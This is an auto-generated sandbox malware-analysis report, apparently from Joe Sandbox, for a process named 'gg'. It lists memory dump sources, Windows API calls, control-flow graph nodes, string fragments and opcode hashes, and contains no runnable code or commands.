                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D136
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 02A2D173
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D1B0
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A2D209
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D136
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 02A2D173
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D1B0
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A2D209
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                                  • Opcode ID: 3c19d12f555f5e8e66726a2efc9ac707761d8501024b9381d2b447e87f0bb04f
                                                                                                                                                                                                                                                  • Instruction ID: f3639ac6d2445472671d6f88330c517c1d70cd22f48648d66f669373965e67ae
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c19d12f555f5e8e66726a2efc9ac707761d8501024b9381d2b447e87f0bb04f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 035158B0D006598FDB14DFA9D548BDEBBF1EF48314F208459D019A7360DB749988CF65
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

[Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq$Hbq$Hbq$`
                                                                                                                                                                                                                                                  • API String ID: 0-4250499658
                                                                                                                                                                                                                                                  • Opcode ID: 24b741278405e1de0559a9b8549219e839691c3d313a4f081c01156c1f24df85
                                                                                                                                                                                                                                                  • Instruction ID: 8bfbac697c2619e2542d78083f816e7a1ef2624a5dd3e59d7a49187c46fe8d93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24b741278405e1de0559a9b8549219e839691c3d313a4f081c01156c1f24df85
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1122A174A002198FDB54CFA8C984B9DBBF2FF49300F1095A9D409AB365D774AE86CF94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

[Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq$Hbq$`
                                                                                                                                                                                                                                                  • API String ID: 0-1535830117
                                                                                                                                                                                                                                                  • Opcode ID: 9b2cd3c51625f2cd212ade7384a242fe1f06d519c0db45cafb56c00845098a4d
                                                                                                                                                                                                                                                  • Instruction ID: 700bc811ec8061518afe278724e5c5121044505239b1fc1897d45152dcffc1cc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b2cd3c51625f2cd212ade7384a242fe1f06d519c0db45cafb56c00845098a4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EF1A074E012198FDB54CFA9C984B9DBBF2BF48300F1095A9D449AB365D730AE86CF94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

[Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A2B086
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                  • Opcode ID: a3a86cd058524b34b8f4882dc1cbe22070ff6f45d399a2ace114d41bf26fa2a1
                                                                                                                                                                                                                                                  • Instruction ID: e012998002feb85dbe4fa325f8a18dbc7281c0cd1edef92a5b49cbf6489cf808
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3a86cd058524b34b8f4882dc1cbe22070ff6f45d399a2ace114d41bf26fa2a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E7114B0A00B158FD724DF29D18075ABBF2BF48704F00892ED48AD7A51DB75E94ACF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

[Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A259F1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                  • Opcode ID: 907e496ed445a0dee48d7320afa25473379a2e4ce73d3af8158ed52cbedd0158
                                                                                                                                                                                                                                                  • Instruction ID: a1ae16e201672396a6738876eeb4aab23d09afd48c7531bcb1b8d14486dfbb21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 907e496ed445a0dee48d7320afa25473379a2e4ce73d3af8158ed52cbedd0158
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941D3B0D0062DCEDB24CFA9C884B9DBBB5FF44304F24809AD409AB255DB755949CF90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 727 2a25935-2a25a01 CreateActCtxA 729 2a25a03-2a25a09 727->729 730 2a25a0a-2a25a64 727->730 729->730 737 2a25a73-2a25a77 730->737 738 2a25a66-2a25a69 730->738 739 2a25a88-2a25ab8 737->739 740 2a25a79-2a25a85 737->740 738->737 744 2a25a6a 739->744 745 2a25aba-2a25b3c 739->745 740->739 744->737
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A259F1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 747 2a2d300-2a2d394 DuplicateHandle 748 2a2d396-2a2d39c 747->748 749 2a2d39d-2a2d3ba 747->749 748->749
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A2D387
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 752 2a2d2f9-2a2d394 DuplicateHandle 753 2a2d396-2a2d39c 752->753 754 2a2d39d-2a2d3ba 752->754 753->754
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A2D387
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 757 2a2a870-2a2b2e8 759 2a2b2f0-2a2b31f LoadLibraryExW 757->759 760 2a2b2ea-2a2b2ed 757->760 761 2a2b321-2a2b327 759->761 762 2a2b328-2a2b345 759->762 760->759 761->762
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A2B101,00000800,00000000,00000000), ref: 02A2B312
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 765 2a2b2a0-2a2b2e8 766 2a2b2f0-2a2b31f LoadLibraryExW 765->766 767 2a2b2ea-2a2b2ed 765->767 768 2a2b321-2a2b327 766->768 769 2a2b328-2a2b345 766->769 767->766 768->769
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A2B101,00000800,00000000,00000000), ref: 02A2B312
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A2B086
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796889424.000000000289D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0289D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_289d000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796889424.000000000289D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0289D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_289d000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796673523.000000000288D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0288D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_288d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796673523.000000000288D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0288D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_288d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4c^q$4c^q$4c^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-3178081935
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
